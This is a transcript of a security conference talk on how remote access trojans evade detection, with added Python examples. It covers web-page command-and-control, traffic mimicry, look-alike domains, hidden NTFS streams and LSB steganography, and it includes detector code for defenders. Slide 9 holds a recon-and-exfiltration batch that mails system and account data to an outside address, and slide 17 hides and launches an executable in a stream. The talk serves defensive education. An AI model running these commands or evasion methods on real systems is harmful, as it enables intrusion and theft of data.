CodeStock14: Hiding in Plain Sight
1. Hiding in Plain Sight
Presented by Rob Gillen (@argodev)
This work is licensed under a Creative Commons Attribution 4.0 International License.
This talk and related resources are available online: https://github.com/argodev/talks/
2. Disclaimer
The content of this presentation represents my personal views and thoughts at the present time. I reserve the right to change my views and opinions at any time. This content is not endorsed by, or representative in any way of, my employer, nor is it intended to be a view into my work or a reflection on the type of work that I or my group performs. It is simply a hobby and personal interest and should be considered as such.
3. HTDCS
Helpdesk Ticket Driven Cyber Security

4. Overview
RAT Design
Encryption
Command/Control (C2)
Anti-Virus
Behavior

5. RAT Design
Exe is dropped via infected page
Queries web page for commands
Performs commands if not done previously
Periodically polls for new commands

6. Encryption
Complex encryption is trivial
PBKDF: scrypt, a sequential memory-hard function
Many iterations (>10K; for scrypt this is the CPU/memory cost parameter N)
Long key lengths
7. Encryption Example
[code slide; the configuration itself was not captured in this transcript]
Above configuration is custom-hardware resistant
Takes approximately ¼ second per guess
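The scrypt configuration from the slide is not in the transcript, so the following is an added example rather than the talk's own code. It derives a key with Python's hashlib.scrypt, shows the memory each guess must touch (the property that makes custom hardware expensive), and turns the slide's quarter-second-per-guess figure into a brute-force cost estimate. The parameter values (N = 2^14, r = 8, p = 1), the 256-bit key length and the 8-lowercase-letter sample keyspace are assumptions of this example, not the talk's values.

```python
import hashlib
import os
import time

# scrypt cost parameters. Assumed for this example; the talk's own values were on
# the slide and are not in the transcript. N is the CPU/memory cost (what the
# slide calls "iterations"), r the block size, p the parallelism.
SCRYPT_N = 2 ** 14
SCRYPT_R = 8
SCRYPT_P = 1
KEY_LEN = 32  # 256-bit key


def scrypt_memory_bytes(n=SCRYPT_N, r=SCRYPT_R):
    """RAM one scrypt evaluation needs, about 128 * N * r bytes. A guess cannot be
    made cheaper by leaving this out, which is what defeats ASIC/GPU crackers."""
    return 128 * n * r


def derive_key(password, salt, n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=KEY_LEN):
    """Password -> fixed-length key. Same password and salt always give the same
    key; a different salt (or one changed character) gives an unrelated key."""
    return hashlib.scrypt(password.encode("utf-8"), salt=salt, n=n, r=r, p=p,
                          maxmem=2 * scrypt_memory_bytes(n, r), dklen=dklen)


def weak_key(password):
    """The setting to avoid: one unsalted SHA-256, millions of guesses per second."""
    return hashlib.sha256(password.encode("utf-8")).digest()


def seconds_per_guess(fn, *args, rounds=3):
    """Wall-clock cost of one evaluation of fn(*args), averaged over a few rounds."""
    start = time.perf_counter()
    for _ in range(rounds):
        fn(*args)
    return (time.perf_counter() - start) / rounds


def brute_force_years(seconds_per_guess, keyspace):
    """Years to exhaust `keyspace` guesses one at a time at the given cost."""
    return seconds_per_guess * keyspace / (365 * 24 * 3600)


if __name__ == "__main__":
    salt = os.urandom(16)
    key = derive_key("correct horse battery", salt)
    slow = seconds_per_guess(derive_key, "correct horse battery", salt)
    fast = seconds_per_guess(weak_key, "correct horse battery")
    print("key:", key.hex())
    print("memory per guess: %.1f MiB" % (scrypt_memory_bytes() / 2 ** 20))
    print("scrypt: %.3f s/guess, sha256: %.9f s/guess" % (slow, fast))
    # 8 lowercase letters at the slide's quarter-second per guess
    print("8 lowercase letters at 0.25 s/guess: %.0f years"
          % brute_force_years(0.25, 26 ** 8))
```

The salt is random per key, so a precomputed table for one victim is useless against the next; raising N doubles both the time and the memory per guess, which is the trade-off the slide's "custom-hardware resistant" claim rests on.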
8. Command/Control
Use Web2C approach
Commands are “issued” en masse via normal, benign-looking web pages
Common ports
Leverages existing HTML/server constructs

9. Command Text
    ipconfig /all > %APPDATA%\info.txt
    net start >> %APPDATA%\info.txt
    tasklist /v >> %APPDATA%\info.txt
    net user >> %APPDATA%\info.txt
    net localgroup administrators >> %APPDATA%\info.txt
    netstat -ano >> %APPDATA%\info.txt
    net use >> %APPDATA%\info.txt
    copy %APPDATA%\info.txt %APPDATA%\output.pdf
    del %APPDATA%\info.txt
    sendmail %APPDATA%\output.pdf Status Update “Jones, William E. wejones@yourorg.gov” itebaffe-836@yopmail.com smtp.yourorg.gov
    del %APPDATA%\output.pdf
The backslash after %APPDATA% is required, since the variable expands without a trailing separator. Note that output.pdf is the plain-text report renamed, not a PDF: a mail gateway that checks attachment content against its extension, rather than the extension alone, sees the mismatch.
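The RAT design (slide 5) and the Web2C idea (slides 8 and 9) together describe a small protocol: poll an ordinary page, pull a command batch out of it, run only batches not seen before. The following is an added example of that parse-and-dedupe logic and of the defender's matching check on the "output.pdf" attachment; it is not the talk's code. The page layout, the HTML-comment marker `c2`, the `id=` header and the sample page are assumptions of this example (the talk does not show its page format), and nothing here executes any command; the batches are only returned as data.

```python
import os
import re

# Constructed sample of a benign-looking page carrying two command batches in HTML
# comments. The "c2" marker, the id= header and the page text are assumptions.
SAMPLE_PAGE = """<html><head><title>Weekly Recipes</title></head>
<body><h1>Lemon Bars</h1><p>Preheat oven to 350F and line a pan.</p>
<!-- build:7 -->
<!-- c2
id=17
ipconfig /all > %APPDATA%\\info.txt
net user >> %APPDATA%\\info.txt
-->
<p>Serve chilled.</p>
<!-- c2
id=18
copy %APPDATA%\\info.txt %APPDATA%\\output.pdf
-->
</body></html>"""

# A batch is an HTML comment that starts with the marker, then an id line, then commands.
COMMAND_BLOCK = re.compile(r"<!--\s*c2\s+(.*?)-->", re.S)


def extract_commands(page_text):
    """Return [(batch_id, [command, ...]), ...] in page order. Comments without the
    marker (build tags, ordinary notes) are ignored, which is the point: the page
    still renders and validates as a normal page."""
    batches = []
    for block in COMMAND_BLOCK.findall(page_text):
        lines = [ln.strip() for ln in block.strip().splitlines() if ln.strip()]
        if not lines or not lines[0].startswith("id="):
            continue
        batches.append((int(lines[0][3:]), lines[1:]))
    return batches


def poll(page_text, done_ids):
    """'Performs commands if not done previously': return only batches whose id
    is not in done_ids and record them. Execution is deliberately left out."""
    new = [(bid, cmds) for bid, cmds in extract_commands(page_text) if bid not in done_ids]
    done_ids.update(bid for bid, _ in new)
    return new


# Defender side: the batch mails info.txt renamed to output.pdf. Real files of
# these types start with fixed bytes; a renamed text file does not.
MAGIC = {".pdf": b"%PDF-", ".exe": b"MZ", ".zip": b"PK\x03\x04", ".png": b"\x89PNG"}


def extension_mismatch(filename, data):
    """True when the extension claims a type whose signature the bytes lack.
    Unknown extensions are not judged (False)."""
    magic = MAGIC.get(os.path.splitext(filename)[1].lower())
    if magic is None:
        return False
    return not data.startswith(magic)


if __name__ == "__main__":
    seen = set()
    print("first poll:", poll(SAMPLE_PAGE, seen))   # two new batches
    print("second poll:", poll(SAMPLE_PAGE, seen))  # nothing new, page unchanged
    print("output.pdf looks like a PDF:", not extension_mismatch("output.pdf", b"Windows IP Configuration"))
```

Because the request is a plain GET for a plain page on port 80 or 443, there is nothing for a port- or signature-based tool to see; what is left is the behaviour (the same client fetching the same page on a schedule, and a "PDF" that is not one).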
10. Mimic User Behavior
Traffic Rates
Monitor incoming/outgoing network traffic for X days
Configure xfil to stay within X% of “normal”
C2
Exponential/randomized stand-down
Only communicate during periods of activity
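An added example (not the talk's code) of the two techniques on this slide: a volume baseline from X days of observation with an exfiltration budget of X% on top of it, and an exponential, randomized stand-down for the C2 poll interval. It also shows the defender's mirror image of the budget and why the baseline must be per weekday: a budget computed from a flat all-days median is caught on a quiet weekend. The 14-day byte counts are constructed sample data; the 5% figure, the 60-second base interval and the one-hour cap are assumptions of this example.

```python
import random
import statistics

# Constructed sample: (weekday, outbound bytes) for one host over 14 days,
# 0 = Monday. Weekends are quiet; that is the detail a flat baseline misses.
OBSERVED = [
    (0, 412_000_000), (1, 398_000_000), (2, 455_000_000), (3, 430_000_000), (4, 401_000_000),
    (5, 30_000_000), (6, 25_000_000),
    (0, 420_000_000), (1, 441_000_000), (2, 409_000_000), (3, 447_000_000), (4, 395_000_000),
    (5, 28_000_000), (6, 31_000_000),
]


def baseline_by_weekday(observed):
    """Median daily volume per weekday: the result of 'monitor traffic for X days'."""
    by_day = {}
    for weekday, nbytes in observed:
        by_day.setdefault(weekday, []).append(nbytes)
    return {wd: statistics.median(v) for wd, v in by_day.items()}


def flat_budget(observed, percent):
    """Naive budget: `percent` of the all-days median, ignoring the weekday."""
    return int(statistics.median(b for _, b in observed) * percent / 100)


def xfil_budget(observed, weekday, percent):
    """Bytes that can be added on that weekday and still stay within `percent`
    of that weekday's normal."""
    return int(baseline_by_weekday(observed)[weekday] * percent / 100)


def flagged(observed, weekday, today_bytes, percent):
    """Defender's mirror image of xfil_budget: is today more than `percent`
    above that weekday's median? A detector with the same threshold as the
    attacker's budget never fires, which is the slide's point."""
    return today_bytes > baseline_by_weekday(observed)[weekday] * (1 + percent / 100)


def next_poll_delay(failures, base=60, cap=3600, seed=None):
    """Exponential/randomized stand-down: after `failures` consecutive empty polls
    wait up to base * 2**failures seconds (capped), drawn uniformly so there is
    no fixed beacon period for a detector to latch on to. `seed` only makes the
    draw reproducible for tests."""
    ceiling = min(cap, base * 2 ** failures)
    return random.Random(seed).uniform(0, ceiling)


if __name__ == "__main__":
    sat = 5
    print("Saturday budget at 5%%: %d bytes" % xfil_budget(OBSERVED, sat, 5))
    print("flat budget at 5%%: %d bytes" % flat_budget(OBSERVED, 5))
    print("flat budget used on Saturday is flagged:",
          flagged(OBSERVED, sat, 29_000_000 + flat_budget(OBSERVED, 5), 5))
    for n in range(5):
        print("delay after %d empty polls: %.0f s" % (n, next_poll_delay(n)))
```

"Only communicate during periods of activity" is the same idea applied to time of day: gate the poll on recent user traffic so that the beacon never appears in an otherwise idle interval.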
11. Mimic User Behavior
Target URLs
Monitor outgoing web queries/URLs for X days
Use similar domain names for malicious traffic
Append similar/same query strings to malicious requests

12. Hiding in Logs
v-client-5b.sjc.dropbox.com
snt-re3-9a.sjc.dropbox.com
yn-in-f125.1e100.net
l1.ycs.vip.dcb.yahoo.com
snt-re3-9a.sjc.drpbox.com
ip-69-31-29-228.nlayer.net
a23-47-20-211.deploy.static.akamaitechnologies.com
l3.ycs.vip.dcb.yahoo.com
ir2.fp.vip.bf1.yahoo.com
www.nbcnews.com.edgesuite.net
wac.946A.edgecastcdn.net
a2.twimg.com
The look-alike hidden in this list is snt-re3-9a.sjc.drpbox.com, one letter away from the genuine snt-re3-9a.sjc.dropbox.com above it; the rest are ordinary CDN and service hostnames of the kind that fill a proxy log.
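An added example (not the talk's code) of the check that catches the trick on these two slides: reduce each logged hostname to its registrable domain, and flag any domain that is not in the set seen during the monitoring window but is within a couple of edits of one that is. The hostnames are the slide's own list; the set of "known" domains stands in for what X days of monitoring would have produced and is an assumption of this example, as is the two-edit threshold.

```python
# Hostnames from the slide. The constructed KNOWN_DOMAINS set represents the
# registrable domains observed during the baseline period.
OBSERVED_HOSTS = [
    "v-client-5b.sjc.dropbox.com",
    "snt-re3-9a.sjc.dropbox.com",
    "yn-in-f125.1e100.net",
    "l1.ycs.vip.dcb.yahoo.com",
    "snt-re3-9a.sjc.drpbox.com",
    "ip-69-31-29-228.nlayer.net",
    "a23-47-20-211.deploy.static.akamaitechnologies.com",
    "l3.ycs.vip.dcb.yahoo.com",
    "ir2.fp.vip.bf1.yahoo.com",
    "www.nbcnews.com.edgesuite.net",
    "wac.946A.edgecastcdn.net",
    "a2.twimg.com",
]
KNOWN_DOMAINS = {"dropbox.com", "1e100.net", "yahoo.com", "nlayer.net",
                 "akamaitechnologies.com", "edgesuite.net", "edgecastcdn.net",
                 "twimg.com"}


def registrable_domain(host):
    """Last two labels. A simplification: production code needs the Public
    Suffix List so that co.uk or com.au style names are handled."""
    return ".".join(host.lower().rstrip(".").split(".")[-2:])


def levenshtein(a, b):
    """Edit distance by the standard two-row dynamic programme."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # delete ca
                           cur[j - 1] + 1,              # insert cb
                           prev[j - 1] + (ca != cb)))   # substitute
        prev = cur
    return prev[-1]


def lookalikes(hosts, known, max_distance=2):
    """Hosts whose registrable domain is unknown but within max_distance edits
    of a known one. Returns [(host, nearest_known_domain), ...]. Exact members
    of `known` are never reported, so the volume of genuine CDN traffic does
    not matter; only near misses do."""
    hits = []
    for host in hosts:
        dom = registrable_domain(host)
        if dom in known:
            continue
        near = [k for k in known if 0 < levenshtein(dom, k) <= max_distance]
        if near:
            hits.append((host, min(near, key=lambda k: levenshtein(dom, k))))
    return hits


if __name__ == "__main__":
    for host, nearest in lookalikes(OBSERVED_HOSTS, KNOWN_DOMAINS):
        print("%s looks like %s" % (host, nearest))
```

The same comparison does not help against the "same query strings" trick on slide 11, since the query string is copied verbatim; that has to be judged by where it is sent, which is exactly what the domain check does.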
13. Other Hiding Techniques
Office file content embedding
Creative location
Alternate Data Streams
Least Significant Bit
Network Protocol Manipulation

14. Creative File Locations
15. Alternate Data Streams
Feature of NTFS since Windows NT 3.1
Used for metadata and compatibility with other file systems (originally Macintosh resource forks)

16. So What?
    #notepad pcast-nitrd-report-2010.pdf:secret.txt
Notepad writes secret.txt into a named stream attached to the PDF. The PDF's content, and its size as listed by dir or Explorer, do not change; the stream only shows up with dir /r (Windows Vista and later), PowerShell's Get-Item -Stream *, or Sysinternals streams.exe.

17. What about this?
    #type evil.exe > notepad.exe:evil.exe
    #start notepad.exe:evil.exe
Two caveats for anyone trying this: Windows XP launches a stream directly with start as shown, but Windows Vista and later refuse to, so a different launcher is needed; and copying the file to a non-NTFS volume (a FAT USB stick, for example) silently drops its streams.
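The streams from slides 16 and 17 are invisible to a plain directory listing but not to `dir /r`. The following is an added example (not the talk's code) of the triage step a responder would run over that output: parse the stream lines, drop the one stream almost every downloaded file legitimately carries (Zone.Identifier, the mark of the web), and report the rest with their sizes. The listing below is a constructed sample in the format `dir /r` prints; the sizes and the report.docx entry are made up for the example.

```python
import re

# Constructed sample of `dir /r` output (Windows Vista and later) for a folder
# holding the two files from the slides plus an ordinary downloaded document.
SAMPLE_DIR_R = r"""
 Volume in drive C has no label.
 Volume Serial Number is 1A2B-3C4D

 Directory of C:\Users\rob\Desktop

03/14/2014  09:58 AM    <DIR>          .
03/14/2014  09:58 AM    <DIR>          ..
03/14/2014  10:02 AM         1,204,344 pcast-nitrd-report-2010.pdf
                                    29 pcast-nitrd-report-2010.pdf:secret.txt:$DATA
03/14/2014  10:05 AM           193,536 notepad.exe
                                73,802 notepad.exe:evil.exe:$DATA
03/14/2014  10:07 AM            11,776 report.docx
                                    26 report.docx:Zone.Identifier:$DATA
               3 File(s)      1,409,656 bytes
               2 Dir(s)  101,220,352,000 bytes free
"""

# Stream lines have no date column: leading spaces, a size, then name:stream:$DATA.
STREAM_LINE = re.compile(r"^\s*([\d,]+)\s+(.+?):([^:\s]+):\$DATA\s*$")

# Streams that are expected on ordinary files. Zone.Identifier is written by
# browsers and mail clients to record where a download came from.
BENIGN_STREAMS = {"Zone.Identifier"}


def parse_streams(dir_r_output):
    """Return [(file_name, stream_name, size_bytes), ...] for every named stream."""
    streams = []
    for line in dir_r_output.splitlines():
        m = STREAM_LINE.match(line)
        if m:
            size = int(m.group(1).replace(",", ""))
            streams.append((m.group(2), m.group(3), size))
    return streams


def suspicious_streams(dir_r_output, min_size=0):
    """Named streams that are not on the benign list and are at least min_size
    bytes. A 29-byte stream may be a note; a 70 KB stream on notepad.exe is
    worth opening."""
    return [(f, s, n) for f, s, n in parse_streams(dir_r_output)
            if s not in BENIGN_STREAMS and n >= min_size]


if __name__ == "__main__":
    for file_name, stream, size in suspicious_streams(SAMPLE_DIR_R):
        print("%s:%s (%d bytes)" % (file_name, stream, size))
```

The same triage applies to PowerShell's `Get-Item -Stream *` output, which also names the `:$DATA` stream explicitly; either way the point of the slide stands, namely that a tool which never asks about streams never sees them.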
18. Crude Image Stego: LSB
Least Significant Bit: alter it and encode the message across the LSBs of successive bytes
Visually imperceptible
Computationally challenging to detect (by eye or by file signature; statistical analysis of the LSB plane can still flag plain LSB replacement)
Encryption also an option

19. LSB: How It Works

20. Carrier Image
Image data:
Size: 2.1 MB
Dimensions: 3500x2343 px
Resolution: 300 dpi
Bit depth: 24
~8 megapixels
“Secret” message: Welcome! Remember, things aren’t always what they seem.

21. LSB Blow-Up
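An added example (not the talk's code) of the LSB technique on slides 18 to 21: embed a message one bit per colour byte with a length header, extract it again, compute how much the slide's 3500x2343 24-bit carrier could hold, bound the per-byte change that makes the result visually imperceptible, and render the LSB plane as 0/255 values, which is the kind of view an "LSB blow-up" produces. The carrier here is 1200 bytes of seeded pseudo-random data standing in for decoded RGB pixels (constructed so the example runs without an image library); the 4-byte header format is an assumption of this example, not the talk's.

```python
import random

# Constructed stand-ins for the slide's carrier and message. A real carrier is the
# raw RGB byte array of a decoded image; seeded pseudo-random bytes play that
# role here so the example runs offline.
_rng = random.Random(3)
SAMPLE_CARRIER = bytes(_rng.randrange(256) for _ in range(1200))
SAMPLE_MESSAGE = "Welcome! Remember, things aren't always what they seem.".encode("utf-8")
HEADER = 4  # bytes used to store the message length (assumed format)


def capacity_bytes(width, height, channels=3):
    """Payload a carrier can hold at one bit per colour byte."""
    return width * height * channels // 8


def fits(carrier, message):
    return (HEADER + len(message)) * 8 <= len(carrier)


def embed(carrier, message):
    """LSB replacement: write a big-endian length, then the message, one bit into
    the low bit of each successive carrier byte. Every carrier byte changes by
    at most 1 out of 255, which is why the eye cannot see it."""
    if not fits(carrier, message):
        raise ValueError("message too long for carrier")
    payload = len(message).to_bytes(HEADER, "big") + message
    out = bytearray(carrier)
    for i, byte in enumerate(payload):
        for bit in range(8):
            pos = i * 8 + bit
            out[pos] = (out[pos] & 0xFE) | ((byte >> (7 - bit)) & 1)
    return bytes(out)


def _read(stego, start, count):
    """Reassemble `count` bytes from the low bits starting at carrier offset start."""
    result = bytearray()
    for i in range(count):
        value = 0
        for bit in range(8):
            value = (value << 1) | (stego[start + i * 8 + bit] & 1)
        result.append(value)
    return bytes(result)


def extract(stego):
    """Inverse of embed: read the length header, then that many bytes."""
    length = int.from_bytes(_read(stego, 0, HEADER), "big")
    if (HEADER + length) * 8 > len(stego):
        raise ValueError("header claims more data than the carrier holds")
    return _read(stego, HEADER * 8, length)


def lsb_plane(data):
    """Map each byte to 0 or 255 by its low bit. Photographic LSBs look like
    noise; ASCII text (high bit always 0, letters clustered) does not, which is
    what an LSB blow-up makes visible."""
    return bytes(255 if b & 1 else 0 for b in data)


def max_abs_change(carrier, stego):
    return max(abs(a - b) for a, b in zip(carrier, stego))


if __name__ == "__main__":
    stego = embed(SAMPLE_CARRIER, SAMPLE_MESSAGE)
    print("recovered:", extract(stego).decode("utf-8"))
    print("max change per byte:", max_abs_change(SAMPLE_CARRIER, stego))
    print("slide carrier capacity: %d bytes" % capacity_bytes(3500, 2343))
    print("first 32 LSBs:", lsb_plane(stego[:32]).hex())
```

Encrypting the message first (the slide's last bullet) removes the ASCII structure from the LSB plane, so the blow-up shows noise on noise; it does not change the statistical footprint of the replacement itself.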
22. Network Protocol Abuse

23. Challenges of Signature-Based Tools

24. Next Steps
Know what you can and can’t see
Consider implications of your monitoring strategy
Behavior *must* play a role

25. Questions / Contact
Rob Gillen
rob@gillenfamily.net
http://rob.gillenfamily.net
@argodev
This talk and related resources are available online: https://github.com/argodev/talks/
